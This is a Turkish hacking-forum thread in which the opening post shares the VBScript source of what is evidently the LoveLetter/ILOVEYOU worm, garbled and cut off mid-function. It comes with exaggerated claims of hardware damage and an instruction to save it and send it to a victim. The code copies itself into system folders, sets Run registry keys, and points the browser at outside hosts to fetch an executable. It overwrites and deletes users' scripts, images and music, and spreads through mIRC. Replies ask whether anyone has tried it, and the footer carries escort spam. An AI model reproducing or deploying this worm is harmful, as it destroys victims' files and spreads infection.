Konuyu Oyla:
  • Derecelendirme: 0/5 - 0 oy
  • 1
  • 2
  • 3
  • 4
  • 5
Dünyayı Sallayan Virüs Kodu 2013
#1
Arkadaslar en bastan soyleyim kendı pcnızde denemeyın
pcnız acılmaz.Açmak için format attıramassınız.Çünkü CD-ROM çalışmaz.CD-ROM u değiştirseniz bile nafile.
Not: Konu bilgi amaçlı verilmiştir.



Kod:
rem delete -pcaş(-vbe)
On es error -pc
On error Next Pc Hack
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
eq=--
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micros oft\Window s Scripting Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&-\MSKernel32.vbs")
c.Copy(dirwin&-\Win32DLL.vbs")
c.Copy(dirsystem&-\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\Run\MSKernel32",dirsystem&-\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\RunServices\Win32DLL",dirwin&-\Win32DLL.vbs"
downread=--
downread=regget("HKEY_CURRENT_USER\Software\Micros oft\Intern et Explorer\Download Directory")
if (downread=--) then
downread="c:\-
end if
if (fileexist(dirsystem&-\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf 7679njbvYT /WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe546786324hjk4j nHHGbvbmKL JKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGq**198vbFV5hfFEkbopBdQZnmPOhfgER67b3V bvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkhYUgqweras djhPhjasfd glkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&-\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\Run\WIN-BUGSFIX",downread&-\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&-\-)
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&-\-&bname&-.vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&-.vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&-.vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="script.ini") or (s="mirc.hlp") then
set scriptini=fso.CreateTextFile(folderspec&-\script.i ni")
scriptini.WriteLine -[script]-
scriptini.WriteLine -;mIRC Script"
scriptini.WriteLine -; Please dont edit this script... mIRC will corrupt, if mIRC will"
scriptini.WriteLine - corrupt... WINDOWS will affect and will not run correctly. thanks"
scriptini.WriteLine -;-
scriptini.WriteLine -;Khaled Mardam-Bey"
scriptini.WriteLine -;http://www.mirc.com"
scriptini.WriteLine -;-
scriptini.WriteLine "n0=on 1:JOIN:#:{-
scriptini.WriteLine "n1= /if ( şnick == şme ) { halt }-
scriptini.WriteLine "n2= /.dcc send şnick -&dirsystem&-\LOVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}-
scriptini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0

Notepad'e yapıştırıp dosyayı .bat olarak kaydedip kurbana yollayın
Ara
Cevapla
#2
waoow Gülümseme güzelmiş ilk defa 1 işe yaradın ha Gülümseme



I'm living in your head,

but you dont know me.

Would you like to meet me?



Ara
Cevapla
#3
sağol ilk defa mı Açık Ağızlı Gülümseme
Ara
Cevapla
#4
kod a baktım da anladıgım kadarı ıle sureklı dosya acıyor ve regeditle ilgili seyleri siliyor bu seklde hem ram'i yorup hemde dosya silip pc nın acılmamasını saglıyor da cd room acılmaz demıssın onunla ılgılı bse goremedım Gülümseme
Ara
Cevapla
#5
hım tmm
Ara
Cevapla
#6
Deneyen var mı?
Ara
Cevapla
#7
yokkk
Ara
Cevapla


Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  KeyLoGGer Arşivi[2013 GünceL] redkit 260 34,327 04.08.2018, Saat:19:13
Son Yorum: sonay720
  Bütün virüs kodları Genest 74 9,829 06.10.2017, Saat:20:42
Son Yorum: haktanvan65
Bug Bat Virüs Oluşturucu ZonKed 10 1,858 07.06.2017, Saat:11:39
Son Yorum: byhz
  Kolay Virüs Temizliği YildizTurk 3 849 21.05.2017, Saat:11:46
Son Yorum: N0XI
  Virüs Total Sahte Belirsiz Kişi 7 1,345 21.05.2017, Saat:11:44
Son Yorum: N0XI

Hızlı Menü:


Konuyu Okuyanlar: 1 Ziyaretçi
escort mersin- izmir escort bayan- izmir escort- alanya escort-